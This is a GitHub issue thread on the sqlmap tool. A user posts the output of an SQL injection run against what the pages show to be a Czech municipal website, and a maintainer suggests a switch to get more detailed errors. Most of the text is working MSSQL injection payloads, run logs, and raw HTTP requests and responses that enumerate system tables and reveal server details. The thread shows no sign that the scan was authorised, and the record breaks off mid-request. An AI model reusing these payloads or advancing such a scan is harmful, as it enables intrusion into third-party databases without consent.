sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

unable to retrieve the number of entries for table #502

Closed dedust closed 11 years ago

dedust commented 11 years ago

any advice with this pls?

Place: GET Parameter: sort Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) Payload: cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT (CASE WHEN (9414=9414) THEN CHAR(40)+CHAR(115)+CHAR(101)+CHAR(108)+CHAR(101)+CHAR(99)+CHAR(116)+CHAR(32)+CHAR(99)+CHAR(111)+CHAR(110)+CHAR(118)+CHAR(101)+CHAR(114)+CHAR(116)+CHAR(40)+CHAR(105)+CHAR(110)+CHAR(116)+CHAR(44)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(53)+CHAR(50)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(54)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(49)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(56)+CHAR(49)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(49)+CHAR(54)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(48)+CHAR(49)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(55)+CHAR(48)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(50)+CHAR(48)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(57)+CHAR(57)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(53)+CHAR(55)+CHAR(41)+CHAR(37)+CHAR(50)+CHAR(98)+CHAR(67)+CHAR(72)+CHAR(65)+CHAR(82)+CHAR(40)+CHAR(49)+CHAR(48)+CHAR(57)+CHAR(41)+CHAR(41)+CHAR(32)+CHAR(70)+CHAR(82)+CHAR(79)+CHAR(77)+CHAR(32)+CHAR(115)+CHAR(121)+CHAR(115)+CHAR(99)+CHAR(111)+CHAR(108)+CHAR(117)+CHAR(109)+CHAR(110)+CHAR(115)+CHAR(41) ELSE 9414*(SELECT 9414 FROM master..sysdatabases) END))&vyhledat=vyhledat

Type: error-based
Title: Microsoft SQL Server/Sybase error-based - Parameter replace
Payload: cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (2221=2221) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))))&vyhledat=vyhledat

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
Payload: cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT (CASE WHEN (7872=7872) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 7872 END))&vyhledat=vyhledat

[22:23:09] [INFO] testing Microsoft SQL Server [22:23:09] [INFO] confirming Microsoft SQL Server [22:23:10] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [22:23:10] [INFO] fetching columns for table 'sysoperators' in database 'msdb' [22:23:10] [INFO] the SQL query used returns 20 entries [22:23:10] [INFO] starting 4 threads [22:23:10] [INFO] resumed: category_id [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: email_address [22:23:10] [INFO] resumed: nvarchar [22:23:10] [INFO] resumed: enabled [22:23:10] [INFO] resumed: tinyint [22:23:10] [INFO] resumed: id [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: last_email_date [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: last_email_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: last_netsend_date [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: last_pager_date [22:23:10] [INFO] resumed: last_netsend_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: netsend_address [22:23:10] [INFO] resumed: pager_address [22:23:10] [INFO] resumed: nvarchar [22:23:10] [INFO] resumed: nvarchar [22:23:10] [INFO] resumed: name [22:23:10] [INFO] resumed: nvarchar [22:23:10] [INFO] resumed: saturday_pager_start_time [22:23:10] [INFO] resumed: saturday_pager_end_time [22:23:10] [INFO] resumed: pager_days [22:23:10] [INFO] resumed: tinyint [22:23:10] [INFO] resumed: sunday_pager_end_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: last_pager_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: weekday_pager_end_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: sunday_pager_start_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] resumed: weekday_pager_start_time [22:23:10] [INFO] resumed: int [22:23:10] [INFO] fetching entries for table 'sysoperators' in database 'msdb' [22:23:10] [INFO] resumed: [22:23:10] [INFO] fetching number of entries for table 'sysoperators' in database 'msdb' [22:23:10] [INFO] retrieved: [22:23:10] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [22:23:10] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [22:23:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[22:23:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [22:23:12] [WARNING] unable to retrieve the number of entries for table 'sysoperators' in database 'msdb' [22:23:12] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 23 times

stamparm commented 11 years ago

I would say that you don't have enough permissions on that table.

Could you please send a console output of same run together with a switch --parse-errors? As error-based technique is usable, there could be an useful error message

dedust commented 11 years ago

Hi, offcourse.

Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_target.asp, line 275 ############################################################################ HTTP request [#2]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E51)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: target.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#2](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://target.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E51)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:04 Content-type: text/html target.cz - Magistrát města Karlovy Vary

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_target.asp, line 275 ############################################################################ HTTP request [#3]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E48)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: target.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#3](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://target:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E48)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:04 Content-type: text/html

Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_mmkv.asp, line 275 ############################################################################ HTTP request [#4]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E1)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#4](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=(SELECT%20(CASE%20WHEN%20(UNICODE(SUBSTRING((SELECT%20ISNULL(CAST(LTRIM(STR(COUNT(%2A)))%20AS%20NVARCHAR(4000)),CHAR(32))%20FROM%20msdb.dbo.sysoperators),1,1))%3E1)%20THEN%20CHAR(40)%2BCHAR(115)%2BCHAR(101)%2BCHAR(108)%2BCHAR(101)%2BCHAR(99)%2BCHAR(116)%2BCHAR(32)%2BCHAR(99)%2BCHAR(111)%2BCHAR(110)%2BCHAR(118)%2BCHAR(101)%2BCHAR(114)%2BCHAR(116)%2BCHAR(40)%2BCHAR(105)%2BCHAR(110)%2BCHAR(116)%2BCHAR(44)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(50)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(54)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR